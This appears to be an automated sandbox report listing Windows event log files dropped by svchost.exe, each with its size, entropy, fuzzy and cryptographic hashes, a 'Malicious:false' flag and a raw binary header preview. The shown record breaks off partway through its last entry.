                            Preview:ElfChnk.........4...............4....................?........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.010692427789071
                            Encrypted:false
                            SSDEEP:384:GhLNzhNCjN0QNGNgN7NxEN5N0RN0zN0mN0RN00N0oN0xN0qNeN0NN0UN0lN09N0Q:GnqqIJMa/Mh9sUwBYAJGUarGlEwxV
                            MD5:26C4C5213F3C6B727417EF07207AC1E0
                            SHA1:1815CC405C8B70939C252390E2A1AEC87EFF45F2
                            SHA-256:767656ADC7440970A3117E0DA8E066D9A3E1DA88CBC82ACABCFA37A3985D5608
                            SHA-512:0355BBF16EB471698F47189031E8E18306D8F748E6CC5328C33301BEAAE435647532B24F5EC42A94B92390C19E60D11846B412C6747DC82DC98999E649607B65
                            Malicious:false
                            Preview:ElfChnk.%.......J.......%.......J............b..Pe.....:....................................................................&...................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........].......M...............................VY..................................**......%........0................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.178919462156868
                            Encrypted:false
                            SSDEEP:384:ohfVaVtVbVHVyV5V+VSVBVNVEVrVBVeVPVpVCVigVgVpVeVNVkVUVAVJVgV6VdVF:ohfKm3t
                            MD5:EE25A9478FAB4FBAB6D89F9F2E7C7EF4
                            SHA1:643403023901E8CB6CB7AE3269A883C2BA3CC4C7
                            SHA-256:699618BC087165CE1AC1F7BE088642E80AA920F351D74DDD3454FA2BFA37C374
                            SHA-512:A13D249D057F6899FB8074B01AEB5A367CC0F36664E4CE479D0EB61A6823ADBBED0D44ADECE4BAE7F5E82AA34B31C02A6E4F3D89827809B39089064F09D01AD9
                            Malicious:false
                            Preview:ElfChnk...............................................}E....................................................................<..N................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**.. .............k...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.428104610855212
                            Encrypted:false
                            SSDEEP:384:UhTm5mcdmNQDmomTDDr0moOm3OPlfmMsgJm5mnmYmcmum/mqmlmtmumbsmbmvMmk:UBdD6CL49mVpgwQFQ
                            MD5:D6AA1FCD43790A397134C5CFC5A86D46
                            SHA1:3F8C5749681331F3316BAEE46632ECDA80712CED
                            SHA-256:C3DA75ABD049DCEDF544ED37E2F12F71ACF2B6C7B0E4E8B13209415F831D266A
                            SHA-512:50872703EC944464CFC5B52813E5AEEB9DA101037C1C641A872F311750DE47DD04885DA3856E30030C2CAA5D5DE2A1CABD290B80CAFAD986C87A9CA8501A152E
                            Malicious:false
                            Preview:ElfChnk..!.......!.......!.......!....................=......................................................................./U................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................#...............&...................................**.......!......o.T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.3524106147187157
                            Encrypted:false
                            SSDEEP:48:MiEWNWwrP+AQNRBEZWTENO4bnB+zMgq+ckH58ykH5bOTLHywdHLP7jM0MckH58yj:SNVaO8sMa3Z85ZMLtrjja3Z85Zu
                            MD5:C665BB87978EBBDC71354545579E80C0
                            SHA1:CC7F6C571B7198162112AF051CDD8B88FF24A626
                            SHA-256:DBBA0D6AEE8D46D3D7EDE566ED4EB6356B8C9D914258DE3B7C8BDECDF2C13325
                            SHA-512:1EE6B50575CDEDCACFF2F3BA500ECD9AA1F898AA04DF792F80CF6BECF6BB9C7905A63D28EEB9E54E1BBAC7EEF564E517112D6DF538E068A1144D516176EA0252
                            Malicious:false
                            Preview:ElfChnk.....................................p.......=..J....................................................................SOq.............................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.014860518194814
                            Encrypted:false
                            SSDEEP:1536:xbBN2A4VD7VAx8whAGU2woJQghcI5oIRA4Hw:
                            MD5:4FB8E2CF8B3F20534836684947962DC2
                            SHA1:B263607E627C81DA77DB65DF5AED2F3FD84B83E2
                            SHA-256:DEAB680C467984C31D118AC595F0F57E573CEEC460CC4B43FCEB0BD66F731294
                            SHA-512:D982DB741A044E222D567712FB4799FF6524A1D451C3D2EE3DF7EB17031AD20EF4EC7098BCFB3E2B00C929EB6569C858EFCF275B28240425E4BF8D994AED9053
                            Malicious:false
                            Preview:ElfChnk.........V...............V...................0q....................................................................... I............................................=...................................................................................%.......................................X...............?...............................................M...F...................................................................................................................................z...............**..............................g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.15655690871689
                            Encrypted:false
                            SSDEEP:768:SPB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9tFk6dd3s:eXY5nVYIyyqED5BVZUeouPZ
                            MD5:2DE60575CB719BF51FAB8A63F696B052
                            SHA1:BD44E6B92412898F185D5565865FEA3778573578
                            SHA-256:7C14D6D72CD2DE834A0C4D17A68B2584B83B81C647D2C439E1071600E29A803D
                            SHA-512:0471E7824795996992E736F33FEA7AF70EA909804DE3AC59EE76B5D0403901A5147558256C3AAE87BA8F1747D151DE63134661BEB9F6E0FF25AB0E3E89BC6B4A
                            Malicious:false
                            Preview:ElfChnk.........o...............o..........................................................................................._..................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................y.......................**................9..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):72208
                            Entropy (8bit):2.2541241390870326
                            Encrypted:false
                            SSDEEP:384:+oroay5oQoay/oioaykoBoay+o/Doay9hdo69CcoTorNorWorbvorTorZorQorNd:dmDCYdAruMx
                            MD5:EE1D987C758D86C483BAFBEA2EDEACFA
                            SHA1:AED9B378A9200B09637BE24A9ED6F85E3E632EE6
                            SHA-256:2D7FB5C71035E8C85B1B98772FAC93D8F72E49853A5D68D1CE2F41E7B8EA5466
                            SHA-512:32337026938236CA9078FFE22989E307933986910680B0AEDA0432AECF5AE7EB2237901E09A2E4E3772020F9DE6C30FCB0B7B0F4BF10FCA0C954D6AD102E1700
                            Malicious:false
                            Preview:ElfChnk.........)...............)...........Hb...d.............................................................................................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................3..................................=/...........$..U)..............................**...... ...........1..............$..............................................................>.......V...7.!..o..................1.....&O......'O....P....... ....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y..k.N.<.D..97d>7.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y./.O.p.e.r.a.t.i.o.n.a.l...be.`=/..................l...............K.\.D.e.v.i.c.e.\.H.a.r.d.d.i.s.k.V.o.l.u.m.e.3.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.8524226245257144
                            Encrypted:false
                            SSDEEP:384:JhAiPA5PNPxPEPHPhPEPmPSPRP3PoPpPTP8PXPr5P:J2Nr
                            MD5:B8E105CC52B7107E2757421373CBA144
                            SHA1:39B61BEA2065C4FBEC143881220B37F3BA50A372
                            SHA-256:B7EE076088005866A01738ECD3421A4DA3A389FFB9EEB663687823E6647F7B4B
                            SHA-512:7670455904F14DA7A9EEFBAD5616D6D00EA262C979EDABB433182500B6EF918C6E534C94DF30D829016C8539DF12CAD5F53EC884C45AA71ACA35CF9B797361BC
                            Malicious:false
                            Preview:ElfChnk......................................#...&...l2.......................................................................................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................#..........'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.8432997252442703
                            Encrypted:false
                            SSDEEP:384:4hZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+l9:4WXSYieD+tvgzmMvRpBWfb
                            MD5:39EE3557626C7F112A88A4DE12E904C1
                            SHA1:C307FECC944D746A49EEA6451B7DA7301F03504C
                            SHA-256:2B47146267E6F31192C54D3EDA77EC9ABE6A88B1C72BA9FE789C8073FD632A5A
                            SHA-512:304C866E246B3F63BF126B33AED784913A078D44913FD987D896D2D960578B61BA7E24BA3CB8FC76608AB1E5702D0FE587A5FB8C38CDF8913D60F88B1435A2D9
                            Malicious:false
                            Preview:ElfChnk......................................"...&.....k.....................................................................n..................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................."..................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.9958304436685177
                            Encrypted:false
                            SSDEEP:384:ghqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28g:gbCyhLfIXBS50G
                            MD5:139666E45F01B24FAF6F0BBD3C472C73
                            SHA1:FFA815ED1A88F4E54C2DECE84DD0427E74D23AB1
                            SHA-256:679A66239AE8631182914EFA619C38FA70FBE8D2119303D56039FE0D23BB32ED
                            SHA-512:92A4FA069765BC44125B489A7BF8E4B37EB1EBA6B0F3F2F49B151CDEA67B6DA6F06FB412C5A1CB74F93CBFBBB406D945A61E39AABD1BAC416616ADB78FC51B1D
                            Malicious:false
                            Preview:ElfChnk.........H...............H...........@........[*......................................................................KV.................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n...................................................6...................................**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-NCrypt%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.838106263184782
                            Encrypted:false
                            SSDEEP:768:ccMhFBuyKskZljdoKXjtT/r18rQXn8r3e5POH:JMhFBuVge
                            MD5:A2D41740C1BAF781019F282E37288DDF
                            SHA1:A6FE635B3EC8A6923EDE10C23FC79DD32EF4F621
                            SHA-256:7008D3010B17C0B09643D10D26B19FB971BB1963C414C1466BEAD617CF9F15E7
                            SHA-512:E33A0A2F9473D2D05E9704FE16E6EE34FB51FD8E25A3D60E1F7A67665CA14421B6511D896526AFC7CAE1BF629BB7013FA10663620C5450F1BB51A465EF5A51CB
                            Malicious:false
                            Preview:ElfChnk.........?...............?...................<.md.....................................................................?.Q................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A......&...................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.634418630947688
                            Encrypted:false
                            SSDEEP:768:/VQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZaUeI36ISKEeKRe:cH
                            MD5:A00BAFFCABB00428EA0512FCECCC55E5
                            SHA1:19F7C942DC26C3FF56D6240158734AFF67D6B93E
                            SHA-256:92264C9E28AB541669DED47CFAF1E818EBD863FA9E8FC6B0F52175D694A9E0D9
                            SHA-512:DF94AA8FA0610A0EFE7BAC0DB2A01645A4CD1C7FAD62E914EF914B526B651ED62600F63909D26149FD17C259348DADE05F48759B1DF092970251DB86690CC2B6
                            Malicious:false
                            Preview:ElfChnk.........m...............m.....................]......................................................................p.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................................%0......**..@...........WW. ..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.0646587531847893
                            Encrypted:false
                            SSDEEP:384:eh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDK:eMAP1Qa5AgfQQgniwS
                            MD5:399CAF70AC6E1E0C918905B719A0B3DD
                            SHA1:62360CD0CA66E23C70E6DE3340698E7C0D789972
                            SHA-256:FD081487CCB0ACEAD6F633AADBA4B977D2C9360CE8EAC36EAB4E3C84A701D849
                            SHA-512:A3E17DA61D4F7C0C94FD0B67707AE35250656842D602906DE515B5E46ECD5078AC68AE607B99DC1A6061B0F896759FE46FF8EE350774205635D30363D46939EA
                            Malicious:false
                            Preview:ElfChnk......................................g...j..%s.g........................................................................................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&...........c..;...............................**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.4364303862010575
                            Encrypted:false
                            SSDEEP:384:PhrE2E+EAsbE3VgEWsUiEcEf4eEOhEmELVFEEE5ejElEreEFEzEAEWE+EWEeEKEy:P3sleByhfIwPGa1SEzy
                            MD5:2BB73ACC8F7419459C4BF931AB85352C
                            SHA1:F1CE2EB960D3886F76094E2327DD092FC1208C7E
                            SHA-256:1969400F6FC72AD4A41092FEC53A19078C98DE9FCB2507A3BD8E1930B2447B62
                            SHA-512:7D882184DA11B490E111502C8193B73248259D43CC5DCE021CD7264212F1BCD3D62F2A3A2F86929663E2E904961D4F1E406E314020FE904D41694A09C1EB0457
                            Malicious:false
                            Preview:ElfChnk.p...............p..................../...1..V......................................................................H...................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................m................*..............%................ ..................&............0......................**......p..........T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):3.0631557320109892
                            Encrypted:false
                            SSDEEP:384:xhYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3KlZ:x1T4hGvj
                            MD5:86AEA3A9CA3E5909FD44812754E52BD6
                            SHA1:F79B583F83F118AC724A5A4206FC439B88BB8C65
                            SHA-256:2AB21F158F9FFA0A375B2ABBD58880A732FABBC436246D40A68DD88D324428C9
                            SHA-512:17796DAA6BCE3C6B7EBACD2A683D085AB08C7701DB5FF91DC2D6531E9CC23FCFC52650A6CD02D8B54D4E8C8D5B59DB1688E18571587E0431E4AA914086BE26F5
                            Malicious:false
                            Preview:ElfChnk.........b...............b...............0...o5@r.....................................................................2..................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.4467272005363894
                            Encrypted:false
                            SSDEEP:384:EEhFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjD6:JzSKEqsMuy6TN
                            MD5:155681C222D825199B738E8DEC707DC8
                            SHA1:704C800E7313F77A218203554E1428DF2819BC34
                            SHA-256:1505E543085CB6AA30119F10DF11AC8CE061DB0CAC6D44A640E711F96750C4BF
                            SHA-512:ADDDE8E26D330EAA13F993D17FF4A6DE7F4120E5B36205EB69FC999B0462B21FD189317EFD1002618551EE24E5C753A09EB34955E8CF1A8E2A22D27516BAB720
                            Malicious:false
                            Preview:ElfChnk.........L...............L...........x.......ZZO.........................................................................................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=............................................y..................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.156155224835584
                            Encrypted:false
                            SSDEEP:384:MhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zE:Mmw9g3LU
                            MD5:F22AC858C2ACC96E8F189E43FFE46FBD
                            SHA1:540B8276921D37FCFFDA3FC7BCFAE1D99A85433B
                            SHA-256:771A6E4098CB30081338F06DD7C0B54248C133F9B7B6849FDADDBD6E6FD5BCE9
                            SHA-512:B4CF3C51B9FB236207B19FE697CEF6E402C6C903E7570B3938F529E5438F96E230463B9A9B17784A98E580E2B18AA9626E96AA83F705D506AF9C2A0432F0F7D5
                            Malicious:false
                            Preview:ElfChnk.........6...............6........... o...p..k.?........................................................................x................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#...........................................~i..................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.9197999988543422
                            Encrypted:false
                            SSDEEP:384:ehqID7I26vIxIPIttIo0IPrI5IMILIjI7I1IIIfrIBBLIgITI:ecx
                            MD5:6C3F290FC62CFA9C240AEE8DB1DBA277
                            SHA1:CFACCF81F3AA31E8DE85CEAFDAA55AA90FA18BEC
                            SHA-256:7841FBB35636229AFB0389965D3DDBD0B7DF4858F1DA8A8FF434830DB8B133D6
                            SHA-512:D2C60875EFADB1F3421CDC095B00E32419C0266CB4F58B17AF09A82AAA20EB488C757BA07E7562A033B84A37B3E035C405200BFB29330F79CA565FF21F5EDA88
                            Malicious:false
                            Preview:ElfChnk.K.......L.......K.......L...........x...86.....U......................................................................+.................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..x...K.........tQ..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 143, DIRTY
                            Category:dropped
                            Size (bytes):76040
                            Entropy (8bit):4.551685398568497
                            Encrypted:false
                            SSDEEP:768:JLjpPv++M48PFVbUa+52j6LjpPv++M48PFVbUa+52jyY20sMY3Dp13/n/ydIxm6c:bU
